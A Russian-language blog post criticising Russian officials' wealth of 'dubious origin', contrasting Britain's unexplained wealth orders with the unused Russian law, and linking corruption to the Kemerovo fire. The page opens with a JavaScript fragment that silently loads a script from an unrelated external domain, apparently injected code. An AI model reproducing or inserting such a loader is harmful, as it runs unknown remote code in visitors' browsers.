, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

А когда Путин обратит внимание на имущество «сомнительного происхождения» своих назначенцев?

27 Мар

Великобритания оформила https://www.gazeta.ru/business/2018/03/26/11696695.shtml  первые ордера на арест российского имущества «сомнительного происхождения».

Этому предшествовало вступление с 1 января  в Великобритании  в силу закона   «О криминальных финансах». Этот закон значительно облегчит правоохранительным структурам Великобритании процесс конфискации награбленного коррумпированными бюрократами и мошенниками имущества.

Официально, по данным Национального Агентства по борьбе с преступностью (National Crime Agency), на туманном Альбионе ежегодно отмывают до 90 миллиардов фунтов стерлингов ($120 миллиардов).

Закон «О криминальных финансах» даёт возможность британским судам направлять иностранным собственникам активов «запрос о состоянии имущества необъясненного происхождения» (unexplained wealth orders, UWO).

Иностранный собственник компаний, недвижимости, банковских счетов, другого имущества, вызвавшего вопросы со стороны государственных органов, обязан будет САМ доказать законность происхождение средств.

Под действие этого закона попадают те россияне, чьи официальные доходы явно недостаточны для покупки имущества, того же особняка в центре Лондона, если стоимость актива превышает 50 тысяч фунтов.

Фактически такая же процедура была предусмотрена ещё шесть лет тому назад в России  для коррумпированных чиновников (п. п. 8 п. 2 ст. 235 ГК РФ). Однако в отличие от закона ««О криминальных финансах», наши законодатели не решились предусмотреть уголовную ответственность за  дачу ложных сведений по поводу активов. Кто-то решил, что наши чиновники лгать не могут. В Великобритании это будет считаться уголовным преступлением.

Поэтому Хорошавину и подобным ему коррупционерам и расхитителям можно было писать в своих декларациях любые сведения, они главой Администрацией президента С. Ивановым воспринимались «чистыми, как слеза».

С доказательственной базой у зарубежных ведомств и судов не будет проблем. Российская Федерация с 1 января обязана приступить к исполнению принятых на себя обязательств в рамках Международного соглашения об автоматическом обмене финансовой информацией (CRS MCAA).

Россия обязана будет автоматически предоставлять финансовым спецслужбам США и Великобритании сведения о доходах российских налогоплательщиков, полученных от средств на банковских счетах, об остатках средств по счетам, а также о платежах с этих счетов.

Но не все средства россиян находятся на счетах. Дополнить информацию о подозрительных лицах может штат «спящих» чиновников, чьи счета, недвижимость находятся за рубежом. Разведки зарубежных стран вряд ли не создали за годы самовластия в России такие штаты «спящих» осведомителей во всей вертикали власти.

«Спящими» оказались и службы безопасности банков. Если они не соучаствовали в хищениях средств из банков, то никаких мер по противодействию разворовывания, не предпринимали. А эти службы, как правило, возглавляли бывшие генералы МВД, КГБ. Можно снимать новые сериалы о том, как «спящие», помогают спецслужбам США, Великобритании бороться с коррупционной деятельностью в России.

А, что же в России?

Правоприменительная практика доказывает, что со своей коррупцией россияне уже на протяжении второго десятилетия сами разобраться не могут. Информацию Навального опровергают в судах, как недоказательную.

Создали главное управление экономической безопасности и противодействия коррупции (ГУЭБиПК) МВД, но Московский городской суд главу этого ведомства, генерал-лейтенанта МВД Дениса Сугробова, приговорил к 22 годам колонии строгого режима и лишил звания.

Его подчиненные получили от четырех до 20 лет колонии строгого режима. Погибший заместитель Сугробова Борис Колесников признан виновным и освобожден от наказания в связи со смертью.

В антикоррупционном управлении МВД, по версии следствия, несколько лет действовало преступное сообщество под руководством Сугробова. Входившие в него офицеры систематически превышали полномочия, поставили на поток фальсификацию оперативных материалов на высокопоставленных чиновников и бизнесменов, массово провоцировали их на преступления. Гособвинение пришло к выводу, что мотива наживы в действиях офицеров не было: подсылая к своим жертвам агентов-провокаторов, сотрудники МВД добивались карьерного роста и наград.

Специальный закон, по противодействию коррупции (п.п.8 п. 2 ст. 235 ГК РФ), фактически шестой год  не действует.

Недавно своим решением В. Путин исключил депутата Ирину Яровую из президентского Совета по борьбе с коррупцией, одного из разработчиков антикоррупционного закона.

В каждом регионе люди видят и знают на каких дорогих авто разъезжают сотрудники полиции, прокуратуры, следствия, в каких домах и квартирах живут, какие дачи и земельные участки имеют. Однако даже официальная статистика доказывает, что нет применения статей 174 и 174−1 УК РФ, предусматривающих ответственность за легализацию (отмывание) денежных средств или иного имущества.

Миллиарды долларов ежегодно вывозят из страны, на призывы Путина воспользоваться амнистией и вернуть капиталы, не реагируют, а эти нормы годами не востребованы. Всё это очень характеризует увешанных званиями и наградами советников и «экспертов» Путина по правовым вопросам.

Эти обстоятельства доказывают, что нелепой является жизнь без власти Конституции и правосудия. Когда осознаем, что без использования этих средств вороватую «элиту» не лишить возможности криминально осуществлять экономическое развитие страны?

Плоды криминальной экономики уже начинают заявлять о себе жертвами ни в чём не повинных людей, пришедших в Торговый центр в Кемерово.

Может, это обстоятельство заставит  Путина выяснять  происхождение имущества у чиновников, что дали разрешение на использование опасного для нахождения в нём Торгового центра?

Беда состоит в том, что подобные «центры» есть в каждом регионе. Значит, возможны сотни тысяч жертв, без какого-либо участия террористов. Свои коррумпированные чиновники породили экономику, которая опасна для  страны и россиян.

В каждом регионе известно каждому россиянину о сказочных богатствах чиновников, доставшемся им в результате злоупотреблений своим должностным положением, которые приводят к трагедиям.

Знают об этом и сотрудники правоохранительных органов и прокуратуры. Но они не наделены правом, собирать  данные на лиц, обладающих  имуществом «сомнительного происхождения».

Законодатель наделил  только Администрацию Президента России правом собирать материалы на чиновников, что живут явно не по средствам, а затем их передавать Генеральному Прокурору, который, и   обращается в суд, требуя применения к чиновнику п.п. 8 п. 2 ст. 235 ГК РФ. Всего за шесть лет было применено не более 40 процедур.

Вот  изъяли на миллиард неправомерно добытого имущества у  Хорошавина, а подобная сумма у Улюкаева осталась. Отделался только штрафом в 130 млн. руб.

Зачем нам такое  криминальное экономическое развитие, если мы криминальным путём строим и создаём то, что может быть от искры уничтожено, лишив  десятки человеческих жизней?

Путин назвал халатность и разгильдяйство причинами трагедии в Кемерово

https://ria.ru/incidents/20180327/1517337296.html

Но мне представляется, что более точно он охарактеризовал ситуацию, когда говорил: «"Без денег справку нельзя получить, а за деньги все, что угодно подпишут". Возможно, придёт и понимание, что надо активнее лишать чиновников пользоваться криминальным обогащением.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.